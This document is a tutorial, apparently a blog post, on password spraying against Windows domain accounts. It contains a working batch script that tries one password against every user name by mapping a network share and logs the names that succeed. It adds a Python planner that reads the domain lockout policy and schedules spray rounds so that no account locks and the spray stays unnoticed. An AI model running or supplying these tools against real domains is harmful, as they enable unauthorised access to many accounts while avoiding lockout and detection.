Generic Password Guessing With a BAT File

Yes, it is possible to break into a user account using nothing but a bat file and a list of user names.

Quite frequently, a run of failed login attempts against one account locks it out, often for 15 minutes. This is an irritation, as it means a single account cannot be brute forced… HOWEVER

Given a list of user names and a single password, we can try every user name we have on file against that one password. Each account then sees only one failed attempt, so as long as the lockout threshold is higher than one, nothing locks (this is the technique usually called password spraying). Check the policy first with ‘net accounts /domain’, which prints the lockout threshold, the lockout duration and the observation window after which the bad-password count resets. The spray may still trip a SIEM/IDS/IPS, since one host producing a failed logon for every account in the domain is a loud pattern, but for smaller companies this is likely to work a treat.

We simply need one file in the same location as the bat file named ‘userlist.txt’, with one user name per line. The results file will be created automatically. All the script does is attempt to map a drive to a share I know everyone should have access to, once per user name, with the generic password ‘password123’.

If the bat file sees that F: has been mapped, the password was accepted: it logs the user name in the results file, unmaps the drive and moves on to the next name.

This attack is useful when you do not have the AD NTDS.DIT file to crack offline in JTR (John the Ripper).

@ECHO OFF
REM Password spray: one password against every name in userlist.txt.
REM userlist.txt sits next to this script, one user name per line.

REM Make sure F: is free before we start.
if exist f:\ net use f: /delete /y

echo Successes>results.txt
echo ###########>>results.txt

for /F "tokens=1" %%i in (userlist.txt) do call :process %%i
goto thenextstep

:process
REM Try to map a share everyone can read, as this user, with the spray password.
REM Change the host, share name and domain (abyz) to suit the target.
net use f: \\127.0.0.1\testShare /USER:abyz\%1 password123

REM A mapped F: means the password was accepted: record the user and unmap.
if exist f:\ (
 echo %1>>results.txt
 echo %1
 net use f: /delete /y
)
goto :EOF

:thenextstep
REM Clean up in case a mapping was left behind.
if exist f:\ net use f: /delete /y
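The lockout arithmetic above is worth checking before the script is run, and it generalises: with a threshold of N you can try N-1 passwords per user inside one observation window, not just one. The following Python planner is an added example, not part of the original post or its batch script. It parses the output of ‘net accounts /domain’ (a constructed sample is embedded, not captured from a real domain), works out how many passwords can be tried per user per window, and splits a password list into rounds with the wait needed between them. It only plans the attempts; the mapping itself is still done by net use. The user names, passwords and policy values are made up.

```python
"""Lockout-aware spray planner (added example; not the batch script above).

Reads the domain lockout policy from `net accounts /domain` output and splits a
password list into rounds that keep every user below the lockout threshold.
It only plans the attempts; the mapping itself is left to net use.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Constructed sample of `net accounts /domain` output (not from a real domain).
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           15
Lockout observation window (minutes):                 15
Computer role:                                        PRIMARY
The command completed successfully.
"""


@dataclass
class LockoutPolicy:
    threshold: int     # bad logons before lockout; 0 means "Never" (no lockout)
    duration_min: int  # minutes the account stays locked
    window_min: int    # minutes of quiet after which the bad-password count resets


def _field(text: str, label: str) -> int:
    """Pull one numeric (or 'Never') value out of net accounts output."""
    match = re.search(rf"^{re.escape(label)}:\s*(\S+)", text, re.MULTILINE)
    if match is None:
        raise ValueError(f"'{label}' not found in net accounts output")
    value = match.group(1)
    return 0 if value.lower() == "never" else int(value)


def parse_net_accounts(text: str) -> LockoutPolicy:
    return LockoutPolicy(
        threshold=_field(text, "Lockout threshold"),
        duration_min=_field(text, "Lockout duration (minutes)"),
        window_min=_field(text, "Lockout observation window (minutes)"),
    )


def safe_attempts_per_window(policy: LockoutPolicy, margin: int = 1) -> Optional[int]:
    """Passwords that may be tried per user inside one observation window.

    None means the domain never locks out. Otherwise threshold-1 is the hard
    ceiling, and `margin` leaves room for the user's own mistyped logons, which
    count against the same bad-password counter as ours.
    """
    if policy.threshold == 0:
        return None
    return max(policy.threshold - 1 - margin, 0)


@dataclass
class SprayRound:
    passwords: List[str]
    attempts: List[Tuple[str, str]]  # (user, password), in execution order
    wait_minutes: int                # pause before the next round may start


def plan_spray(users: Sequence[str], passwords: Sequence[str],
               policy: LockoutPolicy, margin: int = 1) -> List[SprayRound]:
    """Group passwords into rounds; each round tries its passwords against every user."""
    per_window = safe_attempts_per_window(policy, margin)
    if per_window == 0:
        raise ValueError("lockout threshold too low to spray without locking accounts")
    if not passwords:
        return []
    batch = len(passwords) if per_window is None else per_window
    rounds: List[SprayRound] = []
    for start in range(0, len(passwords), batch):
        chunk = list(passwords[start:start + batch])
        # Password-major order: every user sees one attempt before anyone sees a second.
        attempts = [(user, pw) for pw in chunk for user in users]
        is_last = start + batch >= len(passwords)
        # The counter resets window_min after the LAST bad attempt, so wait the full window.
        wait = 0 if is_last or per_window is None else policy.window_min
        rounds.append(SprayRound(chunk, attempts, wait))
    return rounds


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    print(f"threshold={policy.threshold} window={policy.window_min}m "
          f"-> {safe_attempts_per_window(policy)} password(s) per user per window")
    for n, rnd in enumerate(plan_spray(["alice", "bob", "carol"],
                                       ["password123", "Winter2024", "Welcome1", "Spring2024"],
                                       policy), 1):
        print(f"round {n}: {rnd.passwords} over {len(rnd.attempts)} attempts, "
              f"then wait {rnd.wait_minutes} min")
```

With the sample policy (threshold 5, 15-minute window) the planner allows three passwords per user per window, so four passwords become two rounds with a 15-minute pause between them. The margin of one is deliberate: a user who fat-fingers their own password during the spray shares the same counter, and a single lockout is what gets the exercise noticed.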
